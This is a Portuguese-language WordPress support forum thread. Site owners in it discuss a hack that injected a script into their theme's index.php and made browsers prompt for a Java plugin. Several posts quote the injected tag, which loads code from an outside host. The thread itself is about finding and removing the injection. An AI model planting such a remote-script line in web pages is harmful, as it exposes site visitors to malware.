Suporte » Outros assuntos » Meu site pede o plugin Java, é hacker?

  • Resolvido Thiago Alexandre

    (@thiago-alexandre)


    Hoje ao acessar o meu site, eu me deparei com um pedido do chrome para eu instalar o Plugin-Java.

    Logo percebi que se tratava de um problema, pois o pouco que eu conheço do assunto, Java serve para acessar um computador certo?
    e não tem nada no meu site que necessita de Java.

    Outro problema que surgiu foi o no IE9
    parece que o doctype sumiu, e o site entra em modo quick automaticamente.

    Será que alguém invadiu meu site?

    o site é http://www.pururin.com.br

    o único problema que eu encontro é a minha pasta principal public_html
    que tem permissão 770, já tentei mudar e diz que não tenho autorização,
    já entrei em contato com a UOL host e eles me falaram que não posso mudar a permissão dessa pasta.

    Enfim, estou mais perdido que cego em tiroteiro, e não quero prejudicar as pessoas que acessam meu site. me ajudem!

    obrigado desde já

Visualizando 15 respostas - 1 até 15 (de um total de 22)
  • Criador do tópico Thiago Alexandre

    (@thiago-alexandre)

    Estou adicionando informação, eu fui no INDEX.php e encontrei um script suspeito:

    <script type="text/javascript" src="http://dichne.com/js/Check.php"></script>

    ele que faz chamar o java, e isso prova que alguém aplicou isso ali…

    fiquei preocupado com a proteção do meu site, será que é a permissão 770 que permitiu o individuo aplicar esse script ali?

    Olá,

    Mantenha o WordPress sempre atualizado, a versão 2,9 tinha um problema de segurança desse tipo.

    QUem pede o java em seu site diz ser o serviço dropbox (armazenagem de arquivos).

    Criador do tópico Thiago Alexandre

    (@thiago-alexandre)

    Obrigado pela resposta Diana, o meu wordpress está atualizado na última versão.

    quanto ao java estar solicitando o dropbox, deve fazer parte do malware que foi aplicado.

    sinto que terei que tirar o site do ar até o problema ser resolvido.
    para evitar que os meus usuários sejam prejudicados.

    tem alguma forma de encontrar de onde está vindo essa requisição em java?
    qual parte do meu site?

    luke_makey

    (@luke_makey)

    Estou com um problema similar, o mais estranho que ele só aconteceu após o upgrade para a nova versão… antes nunca passei por isso

    Criador do tópico Thiago Alexandre

    (@thiago-alexandre)

    Luke no meu caso estava normal, e aconteceu o problema derrepente…
    uma caractarística é o IE9 estar fixado na lateral esquerda.

    eu estou procurando alguma forma de encontrar esse malware, alguém sabe como?

    luke_makey

    (@luke_makey)

    Se for = ao meu ele esta na página index de seu tema, abra ela e olha se na primeira linha e encontre o código: <script type=”text/javascript” src=”http://dichne.com/js/Check.php”></script&gt;

    Remova esse código que o problema desaparece…

    A questão é como alguem alterou o arquivo??? essa é minha dúvida, e mesmo trocando pode ser que daqui um dia ou mais ou menos ele será alterado novamente e vc tem que ficar tirando o código…

    Quero algo definitivo… comigo depois da atualização do wordpress aconteceu essa alteração 4 vezes

    Criador do tópico Thiago Alexandre

    (@thiago-alexandre)

    Luke, eu removi o mesmo <script> do topo,
    porém ele apenas forçava o navegador a pedir para instalar o JAVA.
    se a pessoa tem java ele ativa automaticamente.
    No firefox ele continua pedindo para aceitar o plugin para funcionar

    e no IE9 continua jogado na lateral.

    Não sei se foi o seu caso, mas o malware continua lá escondido.

    de ultima opção vou pedir para a hospedagem restaurar o backup de 7 dias atrás. =/

    luke_makey

    (@luke_makey)

    Então tem em outras páginas ou algo que ele esta chamando na index, dá uma olhada no código… no meu caso resolveu… mas depois de alguns dias volta

    luke_makey

    (@luke_makey)

    Olhando o código html do seu site ele ainda tá lá

    <script type=”text/javascript” src=”http://dichne.com/js/Check.php”></script&gt;
    <!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd”&gt;
    <html xmlns=”http://www.w3.org/1999/xhtml”&gt;

    <head>

    Pessoal, encontrei esse mesmo script na página de um cliente hoje cedo.

    Qual hospedagem vcs estão usando? Pode ser uma coisa local… Esse cliente está na StarHost.

    luke_makey

    (@luke_makey)

    Não é hospedagem… é alguma falha ou no wordpress e/ou em algum plugin…

    Criador do tópico Thiago Alexandre

    (@thiago-alexandre)

    Ricardo Moraleida e luke_makey, a minha hospedagem é da UOL host.

    Aconteceu depois que atualizei o wordpress para a versão 3.2.2
    se esse é o problema eu não sei, mas é uma possibilidade.

    As permissões de pasta e arquivos de vocês estão corretas?

    luke_makey

    (@luke_makey)

    Também estou sismado com o meu também dar problema após a atualização para nova versão do wordpress… O meu esta na Alog…

    Aparentemente no meu esta tudo ok, refiz várias configurações do site para tentar ver se resolve…

    Mudei o arquivo que sempre é alterado para permissão 444 estou na esperança que isso resolva…

    Mas o problema maior que vejo é que ninguem sabe o que é exatamente, isso é muito preocupante para que usa a plataforma wordpress…

    Pra mim está com cara de uma injeção simples.

    O código estava na primeira linha do index.php em

    /wp-content/themes/tema/

    Retirei, troquei as senhas, agora to terminando a verificação de BD e outros arquivos pra ver se tem mais coisa.

    O WP do cliente era 3.3.1.

    Ah, sim… antes de tirar, o script estava sendo acusado no Sucuri. Depois das senhas trocadas e da linha apagada, agora ela lista como tudo certo:

    http://sitecheck.sucuri.net/scanner/

Visualizando 15 respostas - 1 até 15 (de um total de 22)
  • O tópico ‘Meu site pede o plugin Java, é hacker?’ está fechado para novas respostas.